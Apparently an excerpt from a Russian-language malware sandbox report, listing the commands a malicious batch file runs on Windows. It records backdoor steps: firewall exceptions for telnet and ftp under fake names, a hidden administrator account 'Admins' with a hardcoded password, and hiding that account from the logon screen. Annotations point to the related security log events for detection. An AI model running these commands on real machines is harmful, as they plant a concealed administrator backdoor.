Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\telnet.exe' = '<SYSTEM32>\telnet.exe:*:Enabled:SecuritySuite'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:SvchostConnection'
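- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Admins" /t reg_dword /d 0 /f
  (примечание: значение 0 в разделе SpecialAccounts\UserList скрывает учётную запись «Admins» с экрана входа в Windows; при проверке системы стоит искать этот параметр и сверять его со списком локальных пользователей)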
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\ftp.exe SvchostConnection
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\telnet.exe SecuritySuite
- <SYSTEM32>\net1.exe localgroup Администраторы Admins /ADD
- <SYSTEM32>\chcp.com 1251
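- <SYSTEM32>\net1.exe user Admins 123456789 /expires:never /ADD
  (примечание: создаётся локальная учётная запись «Admins» с паролем, заданным прямо в команде, и без срока действия; соседние команды добавляют её в группу администраторов. В журнале безопасности Windows этому соответствуют события 4720 (создание учётной записи) и 4732 (добавление в локальную группу), если аудит управления учётными записями включён)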
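- <SYSTEM32>\net1.exe localgroup %USERNAME%s Admins /ADD
  (примечание: «%USERNAME%s» здесь, по-видимому, артефакт отчёта — имя группы «Administrators», в котором имя пользователя среды анализа заменено на %USERNAME%; в таком случае команда повторяет добавление в группу «Администраторы» для англоязычной версии Windows)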
- %TEMP%\a59770.bat
- %TEMP%\a59770.bat